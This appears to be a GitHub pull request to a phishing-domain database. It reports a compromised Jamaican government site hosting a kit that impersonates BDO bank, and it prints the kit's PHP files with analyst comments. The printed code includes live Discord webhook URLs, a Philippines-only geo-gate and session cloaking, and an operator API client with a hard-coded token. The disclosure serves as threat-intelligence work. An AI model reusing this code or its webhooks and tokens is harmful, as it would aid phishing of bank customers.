
add www[.]jcdc[.]gov[.]jm #657

Merged
merged 3 commits into from
Jan 8, 2025


g0d33p3rsec

Phishing Domain/URL/IP(s):

www.jcdc.gov.jm
https://www.jcdc.gov.jm/bdo.id/sso/#.php

Impersonated domain

www.bdo.com.ph

Describe the issue

Phishing kit downloaded from https://www.jcdc.gov.jm/bdo.id.zip. Some files of interest:

index.php

<?php 
// Phishing-kit landing page (analyst annotation): suppresses all PHP error
// output, asks crawlers not to index the page, then posts a Discord webhook
// notification for every visitor that loads it.
error_reporting(0); 
header("X-Robots-Tag: noindex, nofollow", true);
// include("geoplugin.php");

// error_bdo.php is not shown on this page; its role cannot be determined here.
require "error_bdo.php";
// Provides the Discord class used below.
require './sso/discord_function.php';

// Embed payload for the visitor notification. The "@everyone @everyone"
// description pings the whole channel the webhook posts into; the red color
// and fixed "BDO IMPOSTOR!!" field are static, no visitor data is filled in here.
$embed = [
    "title"=>"Visitor Logs",
    "description"=>"@everyone @everyone",
    "color"=> hexdec('FF0000'),
    "fields"=>[
        [
            "name"=>"Visitor Details",
            "value"=>"```ini\nBDO IMPOSTOR!!```",
            "inline"=>false
        ],
    ],
    "footer"=>[
        "text"=>"2077BlackOps"
    ]
];

// Posts $embed to the hard-coded webhook URL (an exfiltration/notification
// channel worth blocking). Note the assignment-as-argument: `$hook = '...'`
// sets $hook as a side effect and passes the literal as the third parameter.
// Config index 0 and a null text body are passed; the return value is not
// used further in this listing.
$alert = (new Discord())->dischooks(
    0,
    null,
    $hook = 'https://discord.com/api/webhooks/1140153268081791060/akwLceV_1B-SF3W-8hPjGonoGqJfi39LUIZsCDSuw4NvWwePec8JtuCUUYWK6801g0zh',
    $embed,
);

/sso/discord_function.php

<?php
require 'curl_helper.php';

/**
 * Webhook notifier used by the kit (analyst annotation): wraps a single
 * Discord embed in the webhook JSON format and POSTs it.
 */
class Discord{

/**
 * Posts one embed to a Discord webhook.
 *
 * @param int|string  $config  Index into $discord_config. That variable is never
 *                             defined in this method (the config_item() call is
 *                             commented out), so the `??` fallback below is always
 *                             what $conf becomes.
 * @param string|null $content Plain-text message sent alongside the embed.
 * @param string|null $hook    Webhook URL actually used for the POST (see the
 *                             get_content() call at the end). The webhook URL
 *                             inside the fallback $conf is never read.
 * @param array       $embed   Embed fields; merged with the fallback embed and
 *                             given a timestamp.
 * @return mixed Whatever get_content() returns; that helper is presumably defined
 *               in curl_helper.php, which is not shown on this page.
 */
public function dischooks($config=0, $content=null, $hook = null, $embed=[]) {
        // load curl helper
//        $this->super->call->helper('curl');

//        $discord_config = config_item('DISCORD');
        // $discord_config is undefined here, so $conf is always this literal.
        $conf = $discord_config[$config] ?? [
            'embed' => [
                'color' => hexdec('EA0E85')
            ],
            'bot' => [],
            'hook'=>'https://discord.com/api/webhooks/1139882398960603136/39ic2_Ts4MjStHcfWmn1WPRiJi2s9loB0HgaUrUBsOki_DxDkQtQkN1HvntPCkq8xH9s'
        ];
        // Both locals below are assigned but never used in this method
        // (the username line that would read $bot is commented out).
        $bot = $conf['bot'];
        $hooks = $hook;

        // array_merge() lets the later array win on key collision, so the
        // caller's color is copied into $conf['embed'] first to survive the merge.
        if (isset($embed['color'])) {
            $conf['embed']['color'] = $embed['color'];
        }
        $embed = array_merge($embed, $conf['embed']);
        // $wh is undefined here, so the timestamp is always the current time.
        $embed['timestamp'] = $wh['timestamp'] ?? date("c", time());

        // Discord webhook payload: fixed username and avatar (the gravatar URL
        // is a static indicator), one embed, TTS off. Encoding errors throw.
        $json = json_encode([
            "content" => $content,
            "tts" => false,
//            "username" => $bot['username'],
            "username" => '?',
            "avatar_url" => 'https://ru.gravatar.com/userimage/28503754/1168e2bddca84fec2a63addb348c571d.jpg?size=512',
            "embeds" => [
                $embed,
            ]
        ], JSON_THROW_ON_ERROR);

        // JSON POST to the caller-supplied $hook, not to $conf['hook'].
        return get_content($hook, 'post', [
            'Content-type: application/json',
        ], $json);

    }

}

/sso/fud-init.php

<?php

// Session-arming gate (analyst annotation): a visitor is flagged as a target
// only when the request carries ?code=bdo AND appears to come from the
// Philippines; every visitor is then redirected to the login-page mimic.
require 'core.php';

// The !empty() check is redundant given the strict comparison that follows.
if(!empty($_GET['code']) && $_GET['code'] === 'bdo') {
    // Cloudflare's CF-IPCountry header (2-letter code) is consulted first; the
    // remote lookup in Banco::ClientCountry() (compared against the 3-letter
    // 'PHL') only runs when that header is absent or not 'PH', because of the
    // short-circuiting ||.
    if(
        (!empty($_SERVER['HTTP_CF_IPCOUNTRY']) && $_SERVER['HTTP_CF_IPCOUNTRY'] === 'PH') || 
        Banco::ClientCountry() === 'PHL'
    ) {
        FUD::setup();   // sets the session flag that FUD::run() later checks
    }
}

// Unconditional redirect. The target file name appears redacted ("#.php") in
// this listing; josso_back_to points at the impersonated bank's SSO endpoint.
header("Location: ./#.php?josso_back_to=https://online.bdo.com.ph/sso/josso_security_check");
die();

/sso/core.php

<?php

// Kit bootstrap (analyst annotation): hides errors and rewrites REMOTE_ADDR
// from proxy headers so the later country lookup sees the visitor's address
// rather than the CDN's. Every header read here arrives with the request, so
// the resulting address is only as trustworthy as the proxy path in front
// of the server.
ini_set('display_errors', 0);

// Cloudflare path: CDN-Loop must be exactly "cloudflare" and CF-Connecting-IP
// must be present; any other CDN-Loop value leaves REMOTE_ADDR untouched and
// skips the X-Forwarded-For branch entirely.
if(!empty($_SERVER['HTTP_CDN_LOOP'])) {

    if($_SERVER['HTTP_CDN_LOOP'] === 'cloudflare' && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        $_SERVER["REMOTE_ADDR"] = $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
} elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
    // Generic proxy path: first comma-separated entry of X-Forwarded-For.
    // strpos(...) > 0 treats a comma at offset 0 as "no comma", in which case
    // the whole header value is copied verbatim.
    if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',')>0) {
        $addr = explode(",", $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER["REMOTE_ADDR"] = trim($addr[0]);
    } else {
        $_SERVER["REMOTE_ADDR"] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
}

/**
 * Session gate (analyst annotation). setup() arms the session for a visitor
 * that passed the checks in fud-init.php; run() is the check a protected page
 * performs before rendering.
 */
class FUD {
    // Only session_name is read in this class; cookie_name is unused here.
    private static $__config = [
        'session_name' => 'fud',
        'cookie_name' => 'banco_mars'
    ];
    // Starts a session if none is active (loose == against the constant).
    public static function sess_start() {
        if (session_status() == PHP_SESSION_NONE) {
            session_start();
        }
    }
    // Marks the current session as armed.
    public static function setup(){
        self::sess_start();
        $_SESSION[self::$__config['session_name']] = true;
    }
    // Un-armed visitors get a bare 502 status and execution stops. Armed
    // visitors fall through with a 404 status line (set twice: the protocol
    // status line and a non-standard 'status:' header); the calling page
    // presumably still renders its body under that 404 — confirm against the
    // pages that call run(), which are not shown here.
    public static function run(){
        self::sess_start();
        if(empty($_SESSION[self::$__config['session_name']])) {
            die(http_response_code(502));
        }
        header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
        header('status: 404');
    }
}

/**
 * Client for the operator's remote "edge" API (analyst annotation). The base
 * URL and the two authentication header values are hard-coded below and are
 * indicators in their own right (network egress to block / alert on).
 */
class Banco {
    private static $config = [
        'base_url' => 'https://api.retiredfuccboi.com/',
        'edge' => 'bdo',
        'kawatan' => [
            'id' => '3',
            'token' => 'bp1rc2YM7BjNd1pNVP4DIYiN6JrWYplB7xMlJs67TGjZVfDeez5teBbMKXq1hAthmQ=='
        ]
    ];
    // base_url + edge + '/', i.e. https://api.retiredfuccboi.com/bdo/ with the values above.
    private static function base_url(){
        return self::$config['base_url'].self::$config['edge'].'/';
    }
    /**
     * Calls $method relative to base_url() through the http stream wrapper,
     * authenticating with the X-Kawatan-Token / X-Kawatan-Id headers.
     * GET when $data is empty, otherwise a form-encoded POST. Both
     * file_get_contents() and json_decode() are @-suppressed, so any failure
     * (DNS, TLS, non-JSON body) surfaces only as a null return.
     *
     * @param string $method Path appended verbatim to base_url(); '../' segments
     *                       are not normalized here (see ClientCountry()).
     * @param array  $data   Optional POST fields.
     * @return mixed Decoded JSON (associative arrays for objects), or null on failure.
     */
    public static function api($method, $data = []){

        $httpopt = [
            'method'  => 'GET',
            'header'  => 'X-Kawatan-Token: '.self::$config['kawatan']['token']."\r\n".
            'X-Kawatan-Id: '.self::$config['kawatan']['id']
        ];
        if(!empty($data)) {
            $httpopt['method'] = 'POST';
            $httpopt['header'] = $httpopt['header']."\r\n".'Content-Type: application/x-www-form-urlencoded';
            $httpopt['content'] = http_build_query($data);
        }

        // Errors are suppressed; $api is false when the request fails.
        $api = @file_get_contents(self::base_url().$method, false, stream_context_create([
            'http' => $httpopt
        ]));

        return @json_decode($api, true);
    }
    /**
     * Looks up the visitor's country via GET ../ip?info=<REMOTE_ADDR>, i.e. one
     * path level above the edge prefix. REMOTE_ADDR is interpolated without
     * URL-encoding. Returns the 'country_code' field; fud-init.php compares it
     * with the 3-letter 'PHL'. When api() returns null the offset access yields
     * null (plus a warning hidden by display_errors=0), so the gate fails closed.
     */
    public static function ClientCountry(){
        return self::api('../ip?info='.$_SERVER['REMOTE_ADDR'])['country_code'];
    }
   
}

The discord_function.php file uses https://ru.gravatar.com/userimage/28503754/1168e2bddca84fec2a63addb348c571d.jpg?size=512 as the avatar_url.


image

Related external source

https://urlscan.io/result/f39cb4b2-81e3-45dd-9491-184fbe2c8a54/
https://urlscan.io/result/f92f9fd9-38d9-4e1f-a221-f872ac3b9579/

Screenshot


f39cb4b2-81e3-45dd-9491-184fbe2c8a54

@g0d33p3rsec g0d33p3rsec merged commit 67de8fa into Phishing-Database:master Jan 8, 2025
@g0d33p3rsec g0d33p3rsec deleted the www.jcdc.gov.jm branch January 8, 2025 00:28
@g0d33p3rsec g0d33p3rsec changed the title add www.jcdc.gov.jm add www[.]jcdc[.]gov[.]jm Jan 8, 2025